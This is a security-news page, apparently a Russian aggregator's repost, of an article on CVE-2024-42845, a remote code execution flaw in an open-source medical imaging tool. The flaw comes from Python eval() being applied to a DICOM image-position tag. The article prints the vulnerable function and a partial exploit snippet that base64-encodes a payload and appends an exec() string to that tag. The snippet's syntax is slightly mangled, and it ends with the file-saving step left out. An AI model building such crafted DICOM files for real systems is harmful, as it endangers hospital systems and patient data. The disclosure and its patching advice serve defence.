Новости компьютерной безопасности:

  Latest News

Tic TAC Alert: A Remote Code Execution Vulnerability in Medical Imaging

С сайта: Vulnerability(cybersecuritynews.com)

Tic TAC Alert: A Remote Code Execution Vulnerability in Medical Imaging

Author: Dhivya

A critical Remote Code Execution (RCE) vulnerability has been discovered in a popular open-source biomedical tool used worldwide.

This vulnerability, identified as CVE-2024-42845, has raised concerns about the safety of medical data and the integrity of imaging processes.

The vulnerability has been patched in the latest release, but the incident underscores the need for continuous vigilance in the healthcare software sector.

The vulnerability resides in the handling of DICOM (Digital Imaging and Communications in Medicine) files, a standard for transmitting, storing, and sharing medical images.

DICOM is widely adopted in hospitals and clinics globally, making any security flaws potentially far-reaching.

CVE-2024-42845 – the Vulnerability
The vulnerability, CVE-2024-42845, is associated with a function in the software that processes the DICOM standard tag (0x0020, 0x0032).

This tag contains the coordinates of the upper left-corner voxel of an image. The issue arises from the use of Python’seval()function, which can execute arbitrary code if manipulated by a malicious actor.

def GetImagePosition(self):
    try:
        data = self.data_image[str(0x020)][str(0x032)].replace(",", ".")
    except KeyError:
        return ""
    if data:
        return [eval(value) for value in data.split("\")]
    return ""
Here, theeval()function is called on data extracted from a DICOM file, allowing a malicious payload to be executed if injected into the image position index.

The challenge is that standard payloads are impeded by a character replacement operation within the code. However, attackers can circumvent this by encoding malicious commands using Base64, which is readily available in Python’s standard library.

cyber security newsImage patient
Code Exploit Example

To exploit the vulnerability, an attacker needs to modify or create a DICOM file, appending their payload as a fourth value in the tag at position (0x0020, 0x0032). Upon loading the modified file, the payload would be executed.

import pydicom
import base64
def encode_payload(plain_payload):
    data = open(plain_payload, 'rb').read()
    return f"exec( import ('base64').b64decode({base64.b64encode(data)})"
def prepare_dicom_payload(dicom_file_path, payload):
    dicom_data = pydicom.dcmread(dicom_file_path)
    values = dicom_data[0x0020, 0x0032].value
    mal = [str(i) for i in values]
    mal.append(encode_payload(payload))
    # Further steps to save the modified DICOM file
Securing Medical Imaging Systems
This vulnerability highlights the importance of rigorous security practices in the development and deployment of medical imaging software.

Users of the affected software are advised to update to the latest version immediately. Developers should prioritize secure coding practices and consider additional input validation techniques to prevent similar vulnerabilities.

cyber security newsDicom vulnerability
As per a report by Researcher Partywave, the discovery and responsible disclosure of this RCE vulnerability emphasize the collaborative efforts required to secure open-source medical tools.

While the vulnerability has been addressed, it serves as a reminder of the ongoing challenges facing cybersecurity in healthcare.

Their efforts ensure that the cybersecurity landscape in the medical field continues to strengthen, protecting sensitive patient data and enhancing the reliability of medical technologies.





#Cyber_Security_News #Vulnerability #cyber_security #cyber_security_news #vulnerability

Оригинальная версия на сайте: Tic TAC Alert: A Remote Code Execution Vulnerability in Medical Imaging
Вернуться к списку новостей К свежим новостям Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.

Вернуться к списку новостей Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.


Новости проекта CSN:

✉ CSN.net4me.net

Обновление сайта csn.net4me.net

Обновление сайта csn.net4me.net 💻
cyber security news
  • Физически мы переехали на новый сервер. Благодарим наших подписчиков и постоянных читателей за терпение и понимание.
  • Сайт csn.net4me.net полностью адаптирован для работы по шифрованному SSL соединению.
  • Изменен механизм обработки и отображения опасных и критических уязвимостей.

Благодарим что вы с нами.


#CSN_обновление_сайта
https://csn.net4me.net/cyber_security_8301.html

Дополнительный материал

О проекте CSN

Проект CSN.net4me.net родился 16 Марта 2018 года.
Проект находится в самом начале своего развития. Конечно оформление, наполнение будет меняться. Одно останется неизменным - самые свежие новости компьютерной и сетевой безопасности.

О проекте net4me

Проект net4me.net развивался как сборник готовых решений и документации по темам компьютерной безопасности, сетевых решений и СПО (в часности linux). Темпы развития IT отрасли оказались столь быстрыми, что некоторые знания, технологии и информация о них устаревали мгновенно. Тем не менее, некоторый материал net4me.net до сих пор востребован.

Об источниках

Новости берутся CSN из открытых и доступных каждому источников. Авторы проекта стараются подбирать авторитетные и проверенные источники. Но, тем не менее, не несут ответственности за содержимое новостей. В каждой новости указывается источник этой новости, её автор и ссылка на оригинал новости.

Информация

Если вы желаете чтобы новости вашего ресурса были размещены на сайте CSN, то свяжитесь с авторами проекта csn@net4me.net и предложите ссылку на rss или xml ленту новостей вашего ресурса. Любая предложенная информация будет рассмотрена редакцией.